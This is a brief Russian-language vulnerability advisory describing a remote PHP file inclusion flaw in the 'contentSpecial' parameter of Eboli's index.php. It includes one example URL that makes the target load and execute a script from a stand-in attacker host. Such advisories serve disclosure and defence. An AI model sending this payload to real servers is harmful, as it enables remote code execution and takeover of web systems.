Программа: Eboli

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «contentSpecial» сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример: 

http://x.com/index.php?contentSpecial=http://hack.c/back.txt?&content

Оставить мнение